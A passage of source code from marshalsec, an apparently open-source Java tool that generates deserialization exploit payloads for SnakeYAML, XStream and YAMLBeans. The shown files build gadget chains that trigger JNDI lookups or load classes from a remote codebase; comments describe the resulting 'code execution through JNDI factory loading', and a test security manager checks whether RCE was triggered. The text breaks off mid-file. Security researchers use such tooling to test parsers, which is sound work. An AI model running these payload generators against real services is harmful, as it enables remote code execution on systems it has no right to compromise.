"codebase" 99 | }, defaultArgs = { 100 | MarshallerBase.defaultCodebase 101 | } ) 102 | public Object makeScriptEngine ( UtilFactory uf, String[] args ) throws Exception { 103 | return writeConstructor( 104 | ScriptEngineManager.class, 105 | true, 106 | writeConstructor(URLClassLoader.class, true, writeArray(writeConstructor(URL.class, true, writeString(args[ 0 ]))))); 107 | } 108 | 109 | 110 | /** 111 | * {@inheritDoc} 112 | * 113 | * @see marshalsec.gadgets.CommonsConfiguration#makeConfigurationMap(marshalsec.UtilFactory, java.lang.String[]) 114 | */ 115 | @Override 116 | @Args ( minArgs = 1, args = { 117 | "jndiUrl" 118 | }, defaultArgs = { 119 | MarshallerBase.defaultJNDIUrl 120 | } ) 121 | public Object makeConfigurationMap ( UtilFactory uf, String[] args ) throws Exception { 122 | return writeSet( 123 | writeObject( 124 | ConfigurationMap.class, 125 | Collections.EMPTY_MAP, 126 | 1, 127 | writeConstructor(JNDIConfiguration.class, true, writeConstructor(InitialContext.class, true), writeString(args[ 0 ])))); 128 | } 129 | 130 | 131 | /** 132 | * {@inheritDoc} 133 | * 134 | * @see marshalsec.gadgets.SpringPropertyPathFactory#makePropertyPathFactory(marshalsec.UtilFactory, 135 | * java.lang.String[]) 136 | */ 137 | @Override 138 | @Args ( minArgs = 1, args = { 139 | "jndiUrl" 140 | }, defaultArgs = { 141 | MarshallerBase.defaultJNDIUrl 142 | } ) 143 | public Object makePropertyPathFactory ( UtilFactory uf, String[] args ) throws Exception { 144 | Map properties = new LinkedHashMap<>(); 145 | String jndiUrl = args[ 0 ]; 146 | properties.put("targetBeanName", writeString(jndiUrl)); 147 | properties.put("propertyPath", "foo"); 148 | properties.put( 149 | "beanFactory", 150 | writeObject(SimpleJndiBeanFactory.class, Collections.singletonMap("shareableResources", writeArray(writeString(jndiUrl))), 1)); 151 | return writeObject(PropertyPathFactoryBean.class, properties); 152 | } 153 | 154 | 155 | /** 156 | * {@inheritDoc} 157 | * 158 | * @see marshalsec.gadgets.XBean#makeXBean(marshalsec.UtilFactory, java.lang.String[]) 159 | */ 160 | @Override 161 | @Args ( minArgs = 2, args = { 162 | "codebase", "classname" 163 | }, defaultArgs = { 164 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 165 | } ) 166 | public Object makeXBean ( UtilFactory uf, String[] args ) throws Exception { 167 | // BadAttributeValueExpException constructor as toString trigger 168 | return writeConstructor( 169 | BadAttributeValueExpException.class, 170 | false, 171 | writeConstructor( 172 | ReadOnlyBinding.class, 173 | true, 174 | writeString("foo"), 175 | writeConstructor(Reference.class, true, "foo", writeString(args[ 1 ]), writeString(args[ 0 ])), 176 | writeConstructor(WritableContext.class, true))); 177 | } 178 | 179 | 180 | @Override 181 | @Args ( minArgs = 2, args = { 182 | "codebase", "classname" 183 | }, defaultArgs = { 184 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 185 | } ) 186 | public Object makeResource ( UtilFactory uf, String[] args ) throws Exception { 187 | return writeArray( 188 | // bind to __/obj, this is actually the location where the NamingEntry for 'obj' would be stored 189 | // (which now is stored at __/__/obj) 190 | writeConstructor( 191 | Resource.class, 192 | true, 193 | writeString("__/obj"), 194 | // usual reference setup 195 | writeConstructor(Reference.class, true, writeString("foo"), writeString(args[ 1 ]), writeString(args[ 0 ]))), 196 | 197 | // rebind compound name subresource 198 | // this first tries to rebind the NamingEntry at the compound name __/obj/test 199 | // the lookup of the intermediate context __/obj yields the Reference bound before 200 | // --> code execution through JNDI factory loading 201 | writeConstructor(Resource.class, true, writeString("obj/test"), writeConstructor(Object.class, true))); 202 | } 203 | 204 | 205 | @Override 206 | protected boolean constructorArgumentsSupported () { 207 | return true; 208 | } 209 | 210 | 211 | @Override 212 | protected String constructorPrefix ( boolean inline ) { 213 | return "!!"; 214 | } 215 | 216 | 217 | public static void main ( String[] args ) { 218 | new SnakeYAML().run(args); 219 | } 220 | 221 | } 222 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/TestingSecurityManager.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.net.URL; 27 | import java.security.Permission; 28 | import java.util.HashSet; 29 | import java.util.Set; 30 | 31 | 32 | /** 33 | * 34 | * @author mbechler 35 | * 36 | */ 37 | public class TestingSecurityManager extends SecurityManager { 38 | 39 | private String executed; 40 | private Set remoteCodebases = new HashSet<>(); 41 | 42 | 43 | /** 44 | * {@inheritDoc} 45 | * 46 | * @see java.lang.SecurityManager#checkExec(java.lang.String) 47 | */ 48 | @Override 49 | public void checkExec ( String cmd ) { 50 | this.executed = cmd; 51 | throw new java.lang.SecurityException("Not calling executable " + cmd); 52 | } 53 | 54 | 55 | /** 56 | * {@inheritDoc} 57 | * 58 | * @see java.lang.SecurityManager#checkPermission(java.security.Permission) 59 | */ 60 | @Override 61 | public void checkPermission ( Permission perm ) { 62 | 63 | if ( perm instanceof RuntimePermission ) { 64 | return; 65 | } 66 | 67 | Set cbs = new HashSet<>(); 68 | for ( Class cl : getClassContext() ) { 69 | if ( cl.getProtectionDomain() != null && cl.getProtectionDomain().getCodeSource() != null 70 | && cl.getProtectionDomain().getCodeSource().getLocation() != null 71 | && !"file".equals(cl.getProtectionDomain().getCodeSource().getLocation().getProtocol()) ) { 72 | cbs.add(cl.getProtectionDomain().getCodeSource().getLocation()); 73 | } 74 | } 75 | 76 | this.remoteCodebases.addAll(cbs); 77 | } 78 | 79 | 80 | public void assertRCE () throws Exception { 81 | 82 | if ( this.executed != null ) { 83 | System.err.println("Had execution of " + this.executed); 84 | return; 85 | } 86 | 87 | if ( !this.remoteCodebases.isEmpty() ) { 88 | System.err.println("Had execution from " + this.remoteCodebases); 89 | return; 90 | } 91 | 92 | throw new Exception("Did not trigger RCE"); 93 | } 94 | 95 | } 96 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/UtilFactory.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.util.Comparator; 27 | 28 | import marshalsec.gadgets.JDKUtil; 29 | import marshalsec.gadgets.ToStringUtil; 30 | 31 | 32 | /** 33 | * @author mbechler 34 | * 35 | */ 36 | public interface UtilFactory { 37 | 38 | default Object makeHashCodeTrigger ( Object o1 ) throws Exception { 39 | return JDKUtil.makeMap(o1, o1); 40 | } 41 | 42 | 43 | default Object makeEqualsTrigger ( Object tgt, Object sameHash ) throws Exception { 44 | return JDKUtil.makeMap(tgt, sameHash); 45 | } 46 | 47 | 48 | Object makeToStringTriggerUnstable ( Object obj ) throws Exception; 49 | 50 | 51 | default Object makeToStringTriggerStable ( Object obj ) throws Exception { 52 | return ToStringUtil.makeToStringTrigger(obj); 53 | } 54 | 55 | 56 | default Object makeIteratorTrigger ( Object it ) throws Exception { 57 | return JDKUtil.makeIteratorTriggerNative(this, it); 58 | } 59 | 60 | 61 | default Object makeComparatorTrigger ( Object tgt, Comparator cmp ) throws Exception { 62 | return JDKUtil.makeTreeMap(tgt, cmp); 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/XStream.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.util.Comparator; 27 | 28 | import marshalsec.gadgets.BindingEnumeration; 29 | import marshalsec.gadgets.CommonsBeanutils; 30 | import marshalsec.gadgets.CommonsConfiguration; 31 | import marshalsec.gadgets.ImageIO; 32 | import marshalsec.gadgets.JDKUtil; 33 | import marshalsec.gadgets.LazySearchEnumeration; 34 | import marshalsec.gadgets.Resin; 35 | import marshalsec.gadgets.Rome; 36 | import marshalsec.gadgets.ServiceLoader; 37 | import marshalsec.gadgets.SpringAbstractBeanFactoryPointcutAdvisor; 38 | import marshalsec.gadgets.SpringPartiallyComparableAdvisorHolder; 39 | import marshalsec.gadgets.XBean; 40 | 41 | 42 | /** 43 | * 44 | * Not applicable: 45 | * - UnicastRefGadget,UnicastRemoteObjectGadget: don't think there is anything to gain here 46 | * 47 | * @author mbechler 48 | * 49 | */ 50 | public class XStream extends MarshallerBase implements CommonsConfiguration, Rome, CommonsBeanutils, ServiceLoader, ImageIO, 51 | BindingEnumeration, LazySearchEnumeration, SpringAbstractBeanFactoryPointcutAdvisor, SpringPartiallyComparableAdvisorHolder, Resin, XBean { 52 | 53 | /** 54 | * {@inheritDoc} 55 | * 56 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 57 | */ 58 | @Override 59 | public String marshal ( Object o ) throws Exception { 60 | com.thoughtworks.xstream.XStream xs = new com.thoughtworks.xstream.XStream(); 61 | return xs.toXML(o); 62 | } 63 | 64 | 65 | /** 66 | * {@inheritDoc} 67 | * 68 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 69 | */ 70 | @Override 71 | public Object unmarshal ( String data ) throws Exception { 72 | com.thoughtworks.xstream.XStream xs = new com.thoughtworks.xstream.XStream(); 73 | return xs.fromXML(data); 74 | } 75 | 76 | 77 | /** 78 | * {@inheritDoc} 79 | * 80 | * @see marshalsec.UtilFactory#makeComparatorTrigger(java.lang.Object, java.util.Comparator) 81 | */ 82 | @Override 83 | public Object makeComparatorTrigger ( Object tgt, Comparator cmp ) throws Exception { 84 | return JDKUtil.makePriorityQueue(tgt, cmp); 85 | } 86 | 87 | 88 | public static void main ( String[] args ) { 89 | new XStream().run(args); 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/YAMLBase.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.util.Collections; 27 | import java.util.LinkedHashMap; 28 | import java.util.Map; 29 | import java.util.Map.Entry; 30 | 31 | import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor; 32 | import org.springframework.jndi.support.SimpleJndiBeanFactory; 33 | 34 | import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource; 35 | import com.sun.rowset.JdbcRowSetImpl; 36 | 37 | import marshalsec.gadgets.Args; 38 | import marshalsec.gadgets.C3P0WrapperConnPool; 39 | 40 | 41 | /** 42 | * @author mbechler 43 | * 44 | */ 45 | public abstract class YAMLBase extends MarshallerBase { 46 | 47 | @Args ( minArgs = 1, args = { 48 | "jndiUrl" 49 | }, defaultArgs = { 50 | MarshallerBase.defaultJNDIUrl 51 | } ) 52 | public Object makeJdbcRowSet ( UtilFactory uf, String[] args ) throws Exception { 53 | Map properties = new LinkedHashMap<>(); 54 | properties.put("dataSourceName", writeString(args[ 0 ])); 55 | properties.put("autoCommit", "true"); 56 | return writeObject(JdbcRowSetImpl.class, properties); 57 | } 58 | 59 | 60 | @Args ( minArgs = 1, args = { 61 | "jndiUrl" 62 | }, defaultArgs = { 63 | MarshallerBase.defaultJNDIUrl 64 | } ) 65 | public Object makeRefDataSource ( UtilFactory uf, String[] args ) throws Exception { 66 | Map props = new LinkedHashMap<>(); 67 | props.put("jndiName", writeString(args[ 0 ])); 68 | props.put("loginTimeout", "0"); 69 | return writeObject("com.mchange.v2.c3p0.JndiRefForwardingDataSource", props); 70 | } 71 | 72 | 73 | @Args ( minArgs = 2, args = { 74 | "codebase", "class" 75 | }, defaultArgs = { 76 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 77 | } ) 78 | public Object makeWrapperConnPool ( UtilFactory uf, String[] args ) throws Exception { 79 | return writeObject( 80 | WrapperConnectionPoolDataSource.class, 81 | Collections.singletonMap("userOverridesAsString", writeString(C3P0WrapperConnPool.makeC3P0UserOverridesString(args[ 0 ], args[ 1 ])))); 82 | } 83 | 84 | 85 | @Args ( minArgs = 1, args = { 86 | "jndiUrl" 87 | }, defaultArgs = { 88 | MarshallerBase.defaultJNDIUrl 89 | } ) 90 | public Object makeBeanFactoryPointcutAdvisor ( UtilFactory uf, String[] args ) throws Exception { 91 | Map properties = new LinkedHashMap<>(); 92 | String jndiUrl = args[ 0 ]; 93 | properties.put("adviceBeanName", writeString(jndiUrl)); 94 | properties.put( 95 | "beanFactory", 96 | writeObject(SimpleJndiBeanFactory.class, Collections.singletonMap("shareableResources", writeArray(writeString(jndiUrl))), 2)); 97 | return writeSet( 98 | writeObject(DefaultBeanFactoryPointcutAdvisor.class, properties, 1), 99 | writeConstructor(DefaultBeanFactoryPointcutAdvisor.class, true)); 100 | } 101 | 102 | 103 | protected String writeArray ( String... elems ) { 104 | StringBuilder sb = new StringBuilder(); 105 | sb.append('['); 106 | boolean first = true; 107 | for ( String elem : elems ) { 108 | if ( !first ) { 109 | sb.append(','); 110 | sb.append(' '); 111 | } 112 | else { 113 | first = false; 114 | } 115 | sb.append(elem); 116 | } 117 | sb.append(']'); 118 | return sb.toString(); 119 | } 120 | 121 | 122 | protected String writeObject ( Class clazz, Map properties, String... consArgs ) { 123 | return writeObject(clazz.getName(), properties, consArgs); 124 | } 125 | 126 | 127 | protected String writeObject ( String clazz, Map properties, String... consArgs ) { 128 | return writeObject(clazz, properties, 0, consArgs); 129 | } 130 | 131 | 132 | protected String writeObject ( Class clazz, Map properties, int level, String... consArgs ) { 133 | return writeObject(clazz.getName(), properties, level, consArgs); 134 | } 135 | 136 | 137 | protected String writeObject ( String clazz, Map properties, int level, String... consArgs ) { 138 | StringBuilder sb = new StringBuilder(); 139 | sb.append(writeConstructor(clazz, false, consArgs)); 140 | 141 | if ( !properties.isEmpty() ) { 142 | int indent = ( level + 1 ) * 2; 143 | for ( Entry prop : properties.entrySet() ) { 144 | sb.append('\n'); 145 | for ( int i = 0; i < indent; i++ ) { 146 | sb.append(' '); 147 | } 148 | sb.append(prop.getKey()); 149 | sb.append(':').append(' '); 150 | sb.append(prop.getValue()); 151 | } 152 | } 153 | return sb.toString(); 154 | } 155 | 156 | 157 | protected String writeSet ( String... elements ) { 158 | StringBuilder sb = new StringBuilder(); 159 | sb.append("set:"); 160 | if ( elements.length == 0 ) { 161 | sb.append('\n'); 162 | } 163 | else { 164 | for ( String elem : elements ) { 165 | sb.append('\n'); 166 | sb.append(" ? "); 167 | sb.append(elem); 168 | } 169 | } 170 | return sb.toString(); 171 | } 172 | 173 | 174 | protected String writeConstructor ( Class clazz, boolean inline, String... args ) { 175 | return writeConstructor(clazz.getName(), inline, args); 176 | } 177 | 178 | 179 | protected String writeConstructor ( String clazz, boolean inline, String... args ) { 180 | StringBuilder sb = new StringBuilder(); 181 | sb.append(constructorPrefix(inline)); 182 | sb.append(clazz); 183 | if ( constructorArgumentsSupported() && ( inline || args.length != 0 ) ) { 184 | sb.append(' '); 185 | sb.append(writeArray(args)); 186 | } 187 | return sb.toString(); 188 | } 189 | 190 | 191 | protected abstract String constructorPrefix ( boolean inline ); 192 | 193 | 194 | protected abstract boolean constructorArgumentsSupported (); 195 | 196 | 197 | protected String writeString ( String string ) { 198 | return '"' + string + '"'; 199 | } 200 | 201 | } -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/YAMLBeans.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.StringWriter; 27 | 28 | import com.esotericsoftware.yamlbeans.YamlConfig; 29 | import com.esotericsoftware.yamlbeans.YamlReader; 30 | import com.esotericsoftware.yamlbeans.YamlWriter; 31 | 32 | import marshalsec.gadgets.C3P0WrapperConnPool; 33 | 34 | 35 | /** 36 | * @author mbechler 37 | * 38 | */ 39 | public class YAMLBeans extends YAMLBase implements C3P0WrapperConnPool { 40 | 41 | /** 42 | * {@inheritDoc} 43 | * 44 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 45 | */ 46 | @Override 47 | public String marshal ( Object o ) throws Exception { 48 | YamlConfig yc = new YamlConfig(); 49 | StringWriter sw = new StringWriter(); 50 | YamlWriter w = new YamlWriter(sw, yc); 51 | w.write(o); 52 | return sw.toString(); 53 | } 54 | 55 | 56 | /** 57 | * {@inheritDoc} 58 | * 59 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 60 | */ 61 | @Override 62 | public Object unmarshal ( String data ) throws Exception { 63 | YamlConfig yc = new YamlConfig(); 64 | YamlReader r = new YamlReader(data, yc); 65 | return r.read(); 66 | } 67 | 68 | 69 | @Override 70 | protected boolean constructorArgumentsSupported () { 71 | return false; 72 | } 73 | 74 | 75 | @Override 76 | protected String constructorPrefix ( boolean inline ) { 77 | return "!"; 78 | } 79 | 80 | 81 | public static void main ( String[] args ) { 82 | new YAMLBeans().run(args); 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/Args.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.lang.annotation.Documented; 27 | import java.lang.annotation.Retention; 28 | import java.lang.annotation.RetentionPolicy; 29 | 30 | 31 | /** 32 | * @author mbechler 33 | * 34 | */ 35 | @Retention ( RetentionPolicy.RUNTIME ) 36 | @Documented 37 | public @interface Args { 38 | 39 | int minArgs() default 0; 40 | 41 | 42 | String[] args(); 43 | 44 | 45 | String[] defaultArgs() default {}; 46 | 47 | 48 | boolean noTest() default false; 49 | } 50 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/BindingEnumeration.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import marshalsec.MarshallerBase; 27 | import marshalsec.UtilFactory; 28 | 29 | 30 | /** 31 | * 32 | * This no longer works starting with u121 as it is restricted to JNDI/RMI 33 | * 34 | * @author mbechler 35 | * 36 | */ 37 | public interface BindingEnumeration extends Gadget { 38 | 39 | @Args ( minArgs = 2, args = { 40 | "codebase", "class" 41 | }, noTest = true, defaultArgs = { 42 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 43 | } ) 44 | default Object makeBindingEnumeration ( UtilFactory uf, String[] args ) throws Exception { 45 | return uf.makeIteratorTrigger(JDKUtil.adaptEnumerationToIterator(JDKUtil.makeBindingEnumeration(args[ 0 ], args[ 1 ]))); 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/C3P0RefDataSource.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import marshalsec.MarshallerBase; 27 | import marshalsec.UtilFactory; 28 | import marshalsec.util.Reflections; 29 | 30 | 31 | /** 32 | * @author mbechler 33 | * 34 | */ 35 | public interface C3P0RefDataSource extends Gadget { 36 | 37 | @Primary 38 | @Args ( minArgs = 1, args = { 39 | "jndiUrl" 40 | }, defaultArgs = { 41 | MarshallerBase.defaultJNDIUrl 42 | } ) 43 | default Object makeRefDataSource ( UtilFactory uf, String[] args ) throws Exception { 44 | Object obj = Reflections.createWithoutConstructor(Class.forName("com.mchange.v2.c3p0.JndiRefForwardingDataSource")); 45 | // requires ordering 46 | Reflections.setFieldValue(obj, "jndiName", args[ 0 ]); 47 | Reflections.setFieldValue(obj, "loginTimeout", 0); 48 | return obj; 49 | } 50 | 51 | } 52 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.io.ByteArrayOutputStream; 27 | import java.io.IOException; 28 | import java.io.ObjectOutputStream; 29 | import java.lang.reflect.Constructor; 30 | import java.lang.reflect.InvocationTargetException; 31 | import java.util.Hashtable; 32 | 33 | import javax.naming.Name; 34 | import javax.naming.Reference; 35 | 36 | import 